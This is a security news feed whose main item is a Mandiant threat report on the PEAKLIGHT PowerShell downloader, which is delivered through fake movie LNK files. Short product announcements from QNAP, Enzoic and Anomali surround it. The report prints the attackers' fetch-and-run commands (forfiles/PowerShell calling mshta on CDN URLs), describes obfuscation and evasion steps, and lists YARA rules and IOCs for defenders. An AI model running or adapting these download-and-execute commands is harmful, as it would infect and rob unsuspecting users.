QNAP has released the QTS 5.2 NAS operating system. A standout feature of this release is the debut of Security Center, which actively monitors file activities and thwarts ransomware threats. Additionally, system security receives a boost with the inclusion of support for TCG-Ruby self-encrypting drives (SED). Extensive optimizations have been implemented to streamline operations, configuration, and management processes, significantly elevating the overall user experience. “We greatly appreciate the invaluable feedback provided by our dedicated QTS … More →
The post QNAP releases QTS 5.2 to prevent data loss from ransomware threats appeared first on Help Net Security.
Enzoic released the latest version of Enzoic for Active Directory. The solution provides a frictionless way to continuously monitor, identify and remediate unsafe credentials by screening username and password combinations in Active Directory against Enzoic’s dynamic database. This helps organizations eliminate weak, exposed, or shared passwords, reducing the risk of a successful account takeover. The Verizon DBIR identified that compromised credentials remain a leading way for cybercriminals to access an organization, and Active Directory is … More →
The post Enzoic for Active Directory enhancements help teams identify and remediate unsafe credentials appeared first on Help Net Security.
Written by: Aaron Lee, Praveeth DSouza
TL;DRMandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT.
OverviewMandiant Managed Defense identified a memory-only dropper and downloader delivering malware-as-a-service infostealers. During our investigation, Mandiant observed the malware download payloads such as LUMMAC.V2 (LUMMAC2), SHADOWLADDER, and CRYPTBOT. Mandiant identified the initial infection vector as a Microsoft Shortcut File (LNK) that connects to a content delivery network (CDN) hosting an obfuscated memory-only JavaScript dropper. Analysis of the payload revealed that it executes a PowerShell downloader script on the host. Mandiant named this final downloader PEAKLIGHT.
Figure 1: Infection chain
Infection Chain Stage 1: Movie Lures; A Blast from the PastIn recent investigations, Mandiant identified victims downloading malicious ZIP files disguised as pirated movies. These archives contained a malicious Microsoft Shortcut File (LNK) following the filename schema seen in Figure 2:
* Video_mp4_1080p_x264.zip -> The Movie (HD).lnk * Video_mp4_[1080p].zip -> Full Movie 1080p HD.lnk * @!Movie_HD_1080p_mp4_@!.zip -> Full Movie HD (1080p).lnk * mp4_Full_Video_HD_1080p@!.zip -> Full Video (HD) mp4.lnkFigure 2: Initial infection
During an associated investigation within a client environment, Mandiant identified anomalous outbound network activity to the IP address 62.133.61[.]56. The XML page seen in Figure 3 was subsequently discovered at the URL hxxp://62.133.61[.]56/Downloads.
Figure 3: XML markup
Of particular interest was this snippet from the XML markup, seen in Figure 4.
<D:href>/Downloads/Full%20Video%20HD%20%281080p%29.lnk</D:href> <D:propstat> <D:prop> <D:resourcetype></D:resourcetype> <D:displayname>Full Video HD (1080p).lnk</D:displayname> <D:getcontenttype>application/octet-stream</D:getcontenttype> <D:getetag>"17d6b3e5205a12a0460"</D:getetag> <D:getcontentlength>1120</D:getcontentlength> <D:getlastmodified>Fri, 07 Jun 2024 11:01:44 GMT</D:getlastmodified> <D:supportedlock>Figure 4: Forwarding mechanism
Based on the contents of Figure 4, this code may have served as a redirect or forwarding mechanism for the URL hxxp://62.133.61[.]56/Downloads/Full Video HD (1080p).lnk (MD5: 62f20122a70c0f86a98ff14e84bcc999). Mandiant subsequently acquired this file and determined it was a LNK file configured with a media file icon (Figure 5).
Figure 5: LNK file configured with a media file icon
LNK files are a common tactic used by threat actors to trick unsuspecting users into unknowingly executing malware. These files can be disguised as legitimate documents or programs, making them effective for hiding in plain sight.
At this stage in the investigation, Mandiant identified different command variations within the parameters of the LNK file.
Variation 1The parameters portion of the LNK file was configured to leverage the legitimate Microsoft utility forfiles.exe to search for the file win.ini and execute a PowerShell script. Mandiant observed the execution of the following command (Figure 6):
forfiles.exe /p C:\Windows /m win.ini /c "powershell . mshta https://nextomax.b-cdn[.]net/nexto"Figure 6: Initial PowerShell script variation 1
This command:
Uses the /p command switch for forfiles.exe to set the designated file search path to C:\Windows.
Uses the /m command switch to look for files matching the name win.ini. Then, for each match (though on typical Windows installations there will only be one):
Starts powershell.exe with configurations to load a localized or dot-sourced script, which is signified by the "." (in this case, the output generated by the rest of the command-line parameters).
Retrieves a second-stage payload from the URL hxxps://nextomax.b-cdn[.]net/nexto.
Executes the retrieved payload via mshta.exe.
After executing this LNK file, Windows Media Player was opened on the affected host, and a video of a prominent film studio's opening logo reel played automatically.
This video file was simply called video.mp4 (MD5: 91423dd4f34f759aaf82aa73fa202120) and presumably served as a "cover" video to attempt to alleviate suspicions that the affected host had, in reality, been infected with malware.
Variation 2In a different investigation, Mandiant observed the parameters portion of the LNK file initiated a PowerShell command that employed asterisks (*) as wildcards to launch mshta.exe to discreetly run malicious code retrieved from a remote server.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e'). ('PSChildName')hxxps://potexo.b-cdn[.]net/potexoFigure 7: Initial PowerShell script variation 2
This command:
Runs a script signified by the dot sourcing operator ".".
Uses the Get-ItemProperty (gp) to point to the Mshta registry hive and psChildName to specify the object, mshta.exe.
Retrieves the second-stage payload from the URL hxxps://potexo.b-cdn[.]net/potexo and executes via mshta.exe.
The attackers employed the following evasion techniques to further cover their tracks:
System Binary Proxy Execution: By using mshta.exe, the attackers execute malicious code directly from a remote server, bypassing application control solutions and browser security settings.
Content Delivery Network Abuse: The attackers took advantage of a reputable content delivery network (Bunny CDN) to host their malicious payloads. This abuse of trust associated with CDNs allowed them to circumvent security filters that might not scrutinize traffic from known, trusted sources.
Both variations utilize MITRE ATT&CK® Technique T1218.005: System Binary Proxy Execution: Mshta.
Stage 2: JavaScript DropperFigure 8 shows analysis of the HTML file cached on the CDN contained an obfuscated memory-only JavaScript dropper.
Figure 8: JavaScript dropper layer 1
The script begins by assigning decimal-encoded ASCII characters to randomly named variables. The String.fromCharCode() function is then used to convert the decimal-encoded characters back into their corresponding ASCII characters to decode the JavaScript dropper embedded within the script.
Mandiant identified an embedded payload after decoding the JavaScript dropper, seen in Figure 9.
Figure 9: JavaScript dropper layer 2
The script in Figure 9 carries out the following actions:
1. Decoding Function (wAJ)
The function receives an array of numbers, decodes each by subtracting 619, and then converts the result to its corresponding character using String.fromCharCode(). These characters are then combined to produce the final, decoded string, which is returned by the function.
2. Payload (KbX, YmD)
The variables KbX and YmD contain obfuscated data, which is decoded by the wAJ function.
3. ActiveXObject
The script employs a decoded variable YmD, which resolves to Wscript.shell, to create a new ActiveX object. This object grants the script system-level privileges to execute commands.
4. IMD.Run
Executes the decoded KbX command.
Parameters:
0: This parameter instructs the command to run in a hidden window, keeping its actions concealed from the user.
true: This parameter ensures the script waits for the command to complete its execution before moving on to any subsequent steps.
The payload (KbX) was abbreviated to maintain a concise presentation.
Note: Mandiant used this CyberChef recipe to successfully decode the obfuscated JavaScript dropper.
Variation 1: Hex-Encoded PayloadFigure 10: PowerShell hex-encoded payload
The first command conceals its malicious payload within a string of hexadecimal characters. The execution process adheres to the following sequence:
Stealthy PowerShell Launch: The command initiates PowerShell in a hidden window (-w 1), bypasses execution restrictions (-ep Unrestricted), and skips loading user profiles (-nop), ensuring covert operations.
Hex to Byte Conversion: A custom function (ffQiHkvB) is defined to transform the hexadecimal string into a byte array, a standard format for storing data.
Decryption: The script creates an Advanced Encryption Standard (CBC mode) decryptor using a hex key. The byte array is decrypted, revealing the actual PowerShell code.
Execution: Finally, the decrypted PowerShell code is executed.
Note: Mandiant decoded the payload using a custom CyberChef recipe.
Variation 2: Base64-Encoded PayloadFigure 11: PowerShell Base64-encoded payload
The second command follows a similar structure but with key differences: the malicious payload is encoded using Base64 instead of hexadecimal and is executed through a memory stream.
Stealth and Configuration: The initial steps to launch PowerShell in a hidden, unrestricted mode are the same as in Variation 1.
Base64 Decoding: Instead of a custom function, this variant directly uses PowerShell's built-in FromBase64String method to decode the payload.
Decryption, Decompression, and Execution: The payload is decrypted using AES (ECB mode) with a Base64-encoded key. After decryption, the payload is decompressed into memory using GZIP, revealing the PowerShell code, which is subsequently executed.
PEAKLIGHT is an obfuscated PowerShell-based downloader that checks for the presence of hard-coded filenames and downloads files from a remote CDN if the files are not present.
During our analysis, Mandiant identified the following key differences across the variations of the PEAKLIGHT script:
Note: Mandiant decoded the obfuscated payload using a custom CyberChef recipe.
Variation 1Figure 12: PEAKLIGHT variation 1
This PEAKLIGHT downloader is designed to execute the following tasks:
znY: Writes data to a file.
nbF: Extracts a ZIP archive and runs the first executable file inside.
aXR: Downloads data from an obfuscated URL.
jkg: Deobfuscates a string.
Main Function (AsD)
Video Playback or Download: It checks if video.mp4 exists in the AppData folder. If it exists, it plays the video. If not, it downloads the video from a specified URL, saves it as video.mp4 in the AppData folder, and then plays it.
Image Download: It downloads an image from https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png using Invoke-WebRequest.
ZIP File Handling:
It checks if L1.zip exists in the AppData folder.
If it exists, it extracts its contents to the AppData folder and runs the first executable file found within the ZIP.
If not, it downloads L1.zip from a specified URL, saves it in the AppData folder, extracts its contents, and runs the first executable.
It repeats the same process for L2.zip.
Analysis of the PEAKLIGHT downloader outlined in Figure 12 revealed the following URIs:
https://nextomax.b-cdn[.]net/video.mp4
https://nextomax.b-cdn[.]net/L1.zip
https://nextomax.b-cdn[.]net/L2.zip
https://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png
Figure 13: PEAKLIGHT variation 2
This PEAKLIGHT downloader is designed to deliver and execute additional payloads on a compromised system.
The functions:
Main Execution (bSo function):
Defines two ZIP file paths: K1.zip and K2.zip within the ProgramData directory.
For each of these ZIP files, it checks if they already exist.
If the file exists, it simply unzips it using the Irl function.
If the file is missing, it first uses the function Fzl to decode an obfuscated web address, then downloads the ZIP file from that address using the function OBs. Finally, it unzips the downloaded file using the function Irl.
Analysis of the PEAKLIGHT downloader outlined in Figure 13 revealed the following URIs:
https://potexo.b-cdn[.]net/K1.zip
https://potexo.b-cdn[.]net/K2.zip
Additionally, Mandiant identified other PEAKLIGHT downloader samples connecting to various subdomains hosted on Bunny CDN. These samples will be discussed in more detail in the subsequent stage of analysis.
Stage 4: The Final Payload Variation 1: L1.zip and L2.zipHaving explored the initial stages of the PEAKLIGHT downloader's operation, our focus now shifts to the payload it delivers. As detailed in Variation 1 of Stage 3, this downloader was observed downloading three specific files: L1.zip, L2.zip, and video.mp4. Mandiant successfully acquired and extracted the contents of the files, as seen in Table 1.
Download
Extracted Content
Filename: L2.zip
Hash: 307f40ebc6d8a207455c96d34759f1f3
Type: Archive
Filename: Setup.exe
Hash: d8e21ac76b228ec144217d1e85df2693
Type: Win32 EXE
Filename: L1.zip
Hash: a6c4d2072961e9a8c98712c46be588f8
Type: Archive
Filename: LiteSkinUtils.dll
Hash: 059d94e8944eca4056e92d60f7044f14
Type: Win32 DLL
Filename: Bentonite.cfg
Hash: e7c43dc3ec4360374043b872f934ec9e
Type: PNG
Filename: Video.mp4
Hash: 91423dd4f34f759aaf82aa73fa202120
Type: Video
The second variant of the PEAKLIGHT downloader, discussed in Variation 2 of Stage 3, was observed downloading two archives: K1.zip and K2.zip.
Download
Extracted Content
Filename: K1.zip
Hash: b6b8164feca728db02e6b636162a2960
Type: Archive
Filename: toughie.txt
Hash: dfdc331e575dae6660d6ed3c03d214bd
Type: data
Filename: Aaaa.exe
Hash: b15bac961f62448c872e1dc6d3931016
Type: Win32 EXE
Filename: WCLDll.dll
Hash: 47eee41b822d953c47434377006e01fe
Type: Win32 DLL
Filename: C:\Users\user\AppData\Local\Temp\erefgojgbu
Hash: d6ea5dcdb2f88a65399f87809f43f83c
Type: Win32 EXE
Filename: K2.zip
Hash: 236c709bbcb92aa30b7e67705ef7f55a
Type: Archive
Filename: Jfts.exe
Hash: b15bac961f62448c872e1dc6d3931016
Type: Win32 EXE
Upon execution, Jfts.exe loads the malicious WCLDll.dll from K1.zip. This DLL then leverages the "More Utility" (more.com) to stealthily drop two additional files:
Further analysis has identified an additional PEAKLIGHT downloader variant employing distinct tactics. This variant retrieves its payload,the archives K1.zip and K2.zip, from the domain matodown.b-cdn[.]net. A detailed breakdown of the contents within these archives is presented in Table 3.
Download
Extracted Content
Filename: K1.zip
Hash: bb9641e3035ae8c0ab6117ecc82b65a1
Type: Archive
Filename: cymophane.doc
Hash: f98e0d9599d40ed032ff16de242987ca
Type: ISO
Filename: WebView2Loader.dll
Hash: 58c4ba9385139785e9700898cb097538
Type: Win32 DLL
Filename: K2.zip
Hash: d7aff07e7cd20a5419f2411f6330f530
Type: Archive
Filename: hgjke.exe
Hash: c047ae13fc1e25bc494b17ca10aa179e
Type: Win32 EXE
Filename: AppData\Local\Temp\oqnhustu
Hash: 43939986a671821203bf9b6ba52a51b4
Type: Win32 EXE
PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk. PEAKLIGHT was observed downloading payloads such as LUMMAC.V2, SHADOWADDER, and CRYPTBOT. The malware developers used several different obfuscation and evasion techniques, including system binary proxy execution and CDN abuse. Mandiant identified different variations of the PEAKLIGHT downloader, each with its own unique characteristics.
We encourage security researchers to remain vigilant and share any insights or similar malware samples they encounter. By working together and fostering open communication within the cybersecurity community, we can better understand the evolving threat landscape and strengthen our collective defenses against future attacks.
Protect and scan your environment against the indicators of compromise and YARA rules in the following section. If you suspect that your environment may have been compromised, contact our Incident Response team for assistance.
AcknowledgementsWe would like to thank Adrian McCabe for assistance with LNK research and subject matter expertise, Raymond Leong for the initial analysis of malware stages and payloads, and the Mandiant Research Team for their valuable feedback.
Detections YARA Rules rule M_AES_Encrypted_payload { meta: author = "Mandiant" description = "This rule is desgined to detect on events that exhibits indicators of utilizing AES encryption for payload obfuscation." target_entity = "Process" strings: $a = /(\$\w+\.Key(\s|)=((\s|)(\w+|));|\$\w+\.Key(\s|)=(\s|)\w+\('\w+'\);)/ $b = /\$\w+\.IV/ $c = /System\.Security\.Cryptography\.(AesManaged|Aes)/ condition: all of them } rule M_Downloader_PEAKLIGHT_1 { meta: mandiant_rule_id = "e0abae27-0816-446f-9475-1987ccbb1bc0" author = "Mandiant" category = "Malware" description = "This rule is designed to detect on events related to peaklight. PEAKLIGHT is an obfuscated PowerShell-based downloader which checks for the presence of hard-coded filenames and downloads files from a remote CDN if the files are not present." family = "Peaklight" platform = "Windows" strings: $str1 = /function\s{1,16}\w{1,32}\(\$\w{1,32},\s{1,4}\$\w{1,32}\)\ {\[IO\.File\]::WriteAllBytes\(\$\w{1,32},\s{1,4}\$\w{1,32}\)\}/ ascii wide $str2 = /Expand-Archive\s{1,16}-Path\s{1,16}\$\w{1,32}\ s{1,16}-DestinationPath/ ascii wide $str3 = /\(\w{1,32}\s{1,4}@\((\d{3,6},){3,12}/ ascii wide $str4 = ".DownloadData(" ascii wide $str5 = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12" ascii wide $str6 = /\.EndsWith\(((["']\.zip["'])|(\(\w{1,32}\s{1,16}@\((\d{3,6},){3}\d{3,6}\)\)))/ ascii wide $str7 = "Add -Type -Assembly System.IO.Compression.FileSystem" ascii wide $str8 = "[IO.Compression.ZipFile]::OpenRead" condition: 4 of them and filesize < 10KB } Indicators of Compromise (IOCs) Network-Based IOCs PEAKLIGHT NBIs: hxxps://fatodex.b-cdn[.]net/fatodex hxxps://matodown.b-cdn[.]net/matodown hxxps://potexo.b-cdn[.]net/potexo LUMMAC.V2 C2s: relaxtionflouwerwi[.]shop deprivedrinkyfaiir[.]shop detailbaconroollyws[.]shop messtimetabledkolvk[.]shop considerrycurrentyws[.]shop understanndtytonyguw[.]shop patternapplauderw[.]shop horsedwollfedrwos[.]shop tropicalironexpressiw[.]shop CRYPTBOT C2s: hxxp://gceight8vt[.]top/upload.php hxxps://brewdogebar[.]com/code.vue SHADOWLADDER: hxxp://62.133.61[.]56/Downloads/Full%20Video%20HD%20(1080p).lnk hxxps://fatodex.b-cdn[.]net/K1.zip hxxps://fatodex.b-cdn[.]net/K2.zip hxxps://forikabrof[.]click/flkhfaiouwrqkhfasdrhfsa.png hxxps://matodown.b-cdn[.]net/K1.zip hxxps://matodown.b-cdn[.]net/K2.zip hxxps://nextomax.b-cdn[.]net/L1.zip hxxps://nextomax.b-cdn[.]net/L2.zip hxxps://potexo.b-cdn[.]net/K1.zip hxxps://potexo.b-cdn[.]net/K2.zip Host-Based IOCs CRYPTBOT: erefgojgbu (MD5: d6ea5dcdb2f88a65399f87809f43f83c) L2.zip (MD5: 307f40ebc6d8a207455c96d34759f1f3) Sеtup.exe (MD5: d8e21ac76b228ec144217d1e85df2693) LUMMAC.V2: oqnhustu (MD5: 43939986a671821203bf9b6ba52a51b4) WebView2Loader.dll (MD5: 58c4ba9385139785e9700898cb097538) PEAKLIGHT: Downloader (MD5: 95361f5f264e58d6ca4538e7b436ab67) Downloader (MD5: b716a1d24c05c6adee11ca7388b728d3) SHADOWLADDER: Aaaa.exe (MD5: b15bac961f62448c872e1dc6d3931016) bentonite.cfg (MD5: e7c43dc3ec4360374043b872f934ec9e) cymophane.doc (MD5: f98e0d9599d40ed032ff16de242987ca) K1.zip (MD5: b6b8164feca728db02e6b636162a2960) K1.zip (MD5: bb9641e3035ae8c0ab6117ecc82b65a1) K2.zip (MD5: 236c709bbcb92aa30b7e67705ef7f55a) K2.zip (MD5: d7aff07e7cd20a5419f2411f6330f530) L1.zip (MD5: a6c4d2072961e9a8c98712c46be588f8) LiteSkinUtils.dll (MD5: 059d94e8944eca4056e92d60f7044f14) toughie.txt (MD5: dfdc331e575dae6660d6ed3c03d214bd) WCLDll.dll (MD5: 47eee41b822d953c47434377006e01fe)The backstories of AppSec and cloud security In an industry that moves so quickly and pivots so frequently, it’s easy to forget that the term and discipline of application security (AppSec) emerged in the late 1990s and early 2000s. Driven by what was considered rapid web application growth at the time, the Open Web Application […]
The post CNAPP and ASPM — Friends or Foes? appeared first on OX Security.
The post CNAPP and ASPM — Friends or Foes? appeared first on Security Boulevard.
Anomali announced new capabilities for Anomali Copilot to help security, and now also IT departments, use the latest innovations in AI to successfully defend, protect, and propel their organizations forward. Anomali Copilot empowers security or IT analysts at any skill level to search through petabytes of data––which now includes custom datasets not typically captured by event logs––in seconds. The new capabilities, a result of Anomali’s latest AI model innovations, ensure security and IT professionals can … More →
The post Anomali announces expanded capabilities for Copilot appeared first on Help Net Security.